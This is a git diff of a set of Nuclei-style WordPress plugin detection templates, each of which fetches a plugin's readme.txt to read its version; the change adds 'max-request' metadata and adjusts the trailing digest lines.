file + +# digest: 4b0a0048304602210084783c3e125824e7788a7a665b8985474c626448d8a88a8d3b8d46aec478eff8022100e24b5264e1392a8a01dd15fe9b88b77d94cf6696846635e35818de99ceb9ed04:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index ea387fc8ce..711e6f2f36 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: + max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/google-sitemap-generator/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220403d2d8b1dd9064e9c00fd5fe317032f99899d61bd3d41c53379d05ab8c6f714022100d3c30ec0f7ea076bfb9d262ffb32228e3806923653dccd5a07275e96583ee2eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220403d2d8b1dd9064e9c00fd5fe317032f99899d61bd3d41c53379d05ab8c6f714022100d3c30ec0f7ea076bfb9d262ffb32228e3806923653dccd5a07275e96583ee2eb:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 2ade510bed..9e24c724a2 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: + max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/gtranslate/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c096b962ad91b485dadebf48659294d353c5715447da4d3c48254665c1d417bf022026dccc0f337d419bbe3e06e8460412424da902956a72dc9b6182230de8d1c07f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100c096b962ad91b485dadebf48659294d353c5715447da4d3c48254665c1d417bf022026dccc0f337d419bbe3e06e8460412424da902956a72dc9b6182230de8d1c07f:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 09571935b0..20b65e38b8 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: + max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/gutenberg/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f89c22fbb092fe88ea4820c01227307cddf7e021ee5cd1df4e38325ced5440c4022100bafb8678867c12baa3001d43090b4859bfe53633fbabe6bb4b5bbd37aaec50b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100f89c22fbb092fe88ea4820c01227307cddf7e021ee5cd1df4e38325ced5440c4022100bafb8678867c12baa3001d43090b4859bfe53633fbabe6bb4b5bbd37aaec50b0:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 3d1ef851fc..f9d911d503 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: + max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/happy-elementor-addons/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220758670388c344b04bdc2a8e26fc7dd27e1bd3c53bb72efde84bb97867c5ed726022100f6ad80219ebee0e668fa2973b8912ad3645c9f66e30f909b508c16f5ac4b3be1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220758670388c344b04bdc2a8e26fc7dd27e1bd3c53bb72efde84bb97867c5ed726022100f6ad80219ebee0e668fa2973b8912ad3645c9f66e30f909b508c16f5ac4b3be1:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 329f8b7168..5e455f73ce 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: + max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/header-footer-code-manager/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210081ed75233280330db434594ed985f7b1b99a7c43d6db94aef315cb37995fb91f02201e991b7de8a4bea9d05d1508d3796b4d65afcf8a59902215494ecf0d574cd4b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502210081ed75233280330db434594ed985f7b1b99a7c43d6db94aef315cb37995fb91f02201e991b7de8a4bea9d05d1508d3796b4d65afcf8a59902215494ecf0d574cd4b6:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 59038309ca..58698ed61d 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: + max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/header-footer-elementor/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022050f11bb9902555a938cf0a79e7d706e117f106299367af51db958e012912f18f02201dac579a092e03039db2919a8da1e8bc93c78f057e60cc9c9e9ed8f713319d29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022050f11bb9902555a938cf0a79e7d706e117f106299367af51db958e012912f18f02201dac579a092e03039db2919a8da1e8bc93c78f057e60cc9c9e9ed8f713319d29:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 1e854c2edf..d16a62c3ef 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: + max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/header-footer/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b4ccfe925c0cc49c098a4139a83f9012ca999afdb667e297dc8a36565f217e7e022100cb872fbfdb4940a2b6503bc04c2e9d2455412115e0abd53e14496131fffcfa70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100b4ccfe925c0cc49c098a4139a83f9012ca999afdb667e297dc8a36565f217e7e022100cb872fbfdb4940a2b6503bc04c2e9d2455412115e0abd53e14496131fffcfa70:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index ad3c63fa1f..66363389d0 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: + max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/health-check/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205a5d630d99424bd42567a9aa82d5e668a919f50573f07db06684411e7499819402206210c10a5a28442321ea95135be32e27a988587bd8c5db984c8331bc84c00907:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402205a5d630d99424bd42567a9aa82d5e668a919f50573f07db06684411e7499819402206210c10a5a28442321ea95135be32e27a988587bd8c5db984c8331bc84c00907:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 3e70377c72..8a70b2d7c4 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: + max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/hello-dolly/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022008daf9fa05f43df9ab85272965a1d9e7174e37549c49d7c8d9dd4f4d0badd300022100c7811460a3e6c18109edaa52ab9b075facf4e678e226d769e3c4d8e80935c9c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022008daf9fa05f43df9ab85272965a1d9e7174e37549c49d7c8d9dd4f4d0badd300022100c7811460a3e6c18109edaa52ab9b075facf4e678e226d769e3c4d8e80935c9c6:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 181961bcaa..c014671087 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: + max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/host-webfonts-local/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008cb47ed1163e4cf00272505ce79041b10f58d86583be3a3392c94ce6405d7c9c02207677b87550638ab9de3eddffc0d74a86928ce7eb8259275fb14de89e27b077a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221008cb47ed1163e4cf00272505ce79041b10f58d86583be3a3392c94ce6405d7c9c02207677b87550638ab9de3eddffc0d74a86928ce7eb8259275fb14de89e27b077a4:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 63a8a2d5c0..3f1ed8ac30 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: + max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/imagify/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022039cbbdb9ce6584cc516ca076bc3a638d3a0e0b484fb6f05f524f980c83722add022100c361e63ad0a72a132711e6c586b1bfc5b10a3704ae5d378e809ac6d2af4456da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022039cbbdb9ce6584cc516ca076bc3a638d3a0e0b484fb6f05f524f980c83722add022100c361e63ad0a72a132711e6c586b1bfc5b10a3704ae5d378e809ac6d2af4456da:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 10ded0f322..69685c1b7c 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: + max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/imsanity/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d2b08c496917202db2dc5d6cc76788c3a091eb1de8ee8579046a5ad5f8237b34022025d45a3ec69a114be9de0be9d739ddd0112f9ed9090b8167f354b2b7bc262447:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d2b08c496917202db2dc5d6cc76788c3a091eb1de8ee8579046a5ad5f8237b34022025d45a3ec69a114be9de0be9d739ddd0112f9ed9090b8167f354b2b7bc262447:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index dc1e33610c..ea3bc2af3e 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: + max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/insert-headers-and-footers/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100827112cc01ee159ef70fb8c1ea79cea140bf63793cf831073dcca5f5670b9ee2022100d0a3ea05ead6fa7a362a7e7532db2dd76397e41851cc18e4909900f83da6dbf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100827112cc01ee159ef70fb8c1ea79cea140bf63793cf831073dcca5f5670b9ee2022100d0a3ea05ead6fa7a362a7e7532db2dd76397e41851cc18e4909900f83da6dbf7:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index cad82493ab..d81b8b6240 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: + max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/instagram-feed/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fd25a37f43bdd8db268439079c0008b20fed95e48185bc04906e3e17c52de085022005940a364ab9f27e340c0b89e0daed746253fd319380281036d0b83866ceb7a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100fd25a37f43bdd8db268439079c0008b20fed95e48185bc04906e3e17c52de085022005940a364ab9f27e340c0b89e0daed746253fd319380281036d0b83866ceb7a9:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 013140f82d..373f6f2809 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: + max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/intuitive-custom-post-order/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e48d3d8b47799fe4487c94daf57163d1283b80e0017bfacd677bdac7a2a6bddf022100b87f78a6959f719eeca562868a06f2d5659aa2d73c5fb9d67e11adea16d521b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100e48d3d8b47799fe4487c94daf57163d1283b80e0017bfacd677bdac7a2a6bddf022100b87f78a6959f719eeca562868a06f2d5659aa2d73c5fb9d67e11adea16d521b3:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 9bbf8468dc..f7171226f0 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: + max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/iwp-client/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220136e79db0d217ee2858ed8c1d5675d6a4871003996590bb204abd22f332f61ea022015d1c228ec8aea6a28d2a8c8fe5bce694eae10b39e69ba0258646ab654f6522b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220136e79db0d217ee2858ed8c1d5675d6a4871003996590bb204abd22f332f61ea022015d1c228ec8aea6a28d2a8c8fe5bce694eae10b39e69ba0258646ab654f6522b:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 4a92035eb0..2f01b0dfa2 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/jetpack-boost/ metadata: + max-request: 1 plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/jetpack-boost/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b797811f797adfe6c8725536e01912d9ae5d9a6e1540286360d345f85d27d18e02202ae80b3220814827150fa586594accf015a311f89d73bc40216210355da1fb18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b797811f797adfe6c8725536e01912d9ae5d9a6e1540286360d345f85d27d18e02202ae80b3220814827150fa586594accf015a311f89d73bc40216210355da1fb18:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 4d7667ae74..a2406d3dab 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: + max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/jetpack/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008fac30cf48dbc20a146a6e7742cd8ce222c81c7db934f2f82d7faf36018720bb022100c19ba4940f2f6e153a46cc7175132e99027394bee8f28245de0c898eb3e4ffd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221008fac30cf48dbc20a146a6e7742cd8ce222c81c7db934f2f82d7faf36018720bb022100c19ba4940f2f6e153a46cc7175132e99027394bee8f28245de0c898eb3e4ffd8:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index bc1afcf41e..89e1c48335 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: + max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/kadence-blocks/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202cab0c7bd9d2b3a072433d145a80d719e259ddd8faf24c1c1dc316d0ed3db1da02201694771594dee9fbd51e20b6419728869d0f4ba3be57549f719e7c8d9d994642:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402202cab0c7bd9d2b3a072433d145a80d719e259ddd8faf24c1c1dc316d0ed3db1da02201694771594dee9fbd51e20b6419728869d0f4ba3be57549f719e7c8d9d994642:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 7e24a5c714..3453d7a0b4 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: + max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/kirki/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022001a0ec051dd1af618e988ea43b124a1dc0484d32e6277e5dc1f1597c20a136ed02201c8755b7d3608b285dc2e1e834f626250f84954698182f3db4b681483d08f301:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022001a0ec051dd1af618e988ea43b124a1dc0484d32e6277e5dc1f1597c20a136ed02201c8755b7d3608b285dc2e1e834f626250f84954698182f3db4b681483d08f301:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 702a08c417..6485799437 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: + max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/leadin/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bb9deb10dd386c70ec00dd951e51b27685049a78bb3ed3f294ca51ead6d8c309022100d30bd379a357430ebac3fd5a0947d947b7c02a966eec6f630d43bef11959965b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100bb9deb10dd386c70ec00dd951e51b27685049a78bb3ed3f294ca51ead6d8c309022100d30bd379a357430ebac3fd5a0947d947b7c02a966eec6f630d43bef11959965b:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 1183e32aea..7dca1baf60 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/limit-login-attempts-reloaded/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022023748f776e321fdd32b40c3941b40bd7ca1288b97dc691cc64dbf5ca380bf742022100bef9efec333f585ef8e3302ca9db7d5067ce595009e32096ed1dda599426beb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022023748f776e321fdd32b40c3941b40bd7ca1288b97dc691cc64dbf5ca380bf742022100bef9efec333f585ef8e3302ca9db7d5067ce595009e32096ed1dda599426beb4:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index f036902ee1..d07bd0ea6e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/limit-login-attempts/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204a0823d5c8c6f7ff9f9fa4aea43dd55b16271a18b9f8baf524d83b09839ff884022100b2c009aef3a1db07cdd78654cdb598ce6dcfbe888f31412451ad43da8236bdcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502204a0823d5c8c6f7ff9f9fa4aea43dd55b16271a18b9f8baf524d83b09839ff884022100b2c009aef3a1db07cdd78654cdb598ce6dcfbe888f31412451ad43da8236bdcb:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 68123dca7f..17d4480465 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: + max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/litespeed-cache/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205d93c18fdef4692ba05238b13ea390f4036d735dcb09c444a2b6235cbb76bb2302207bc3f5e2851d2612c0b929c6ae92f2443b4ddf87c480a6e6130a0d29556c1c61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402205d93c18fdef4692ba05238b13ea390f4036d735dcb09c444a2b6235cbb76bb2302207bc3f5e2851d2612c0b929c6ae92f2443b4ddf87c480a6e6130a0d29556c1c61:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index c69f583de1..4794ff35a7 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: + max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/loco-translate/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201ebcad1f27a3d493e1a4e4df3feeef3387ca7b96687b4537f60ac18060c0caf3022100ead072da01ed0bb545a105fcac8ca1321637aa3240feed6b596708c9d729f7a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 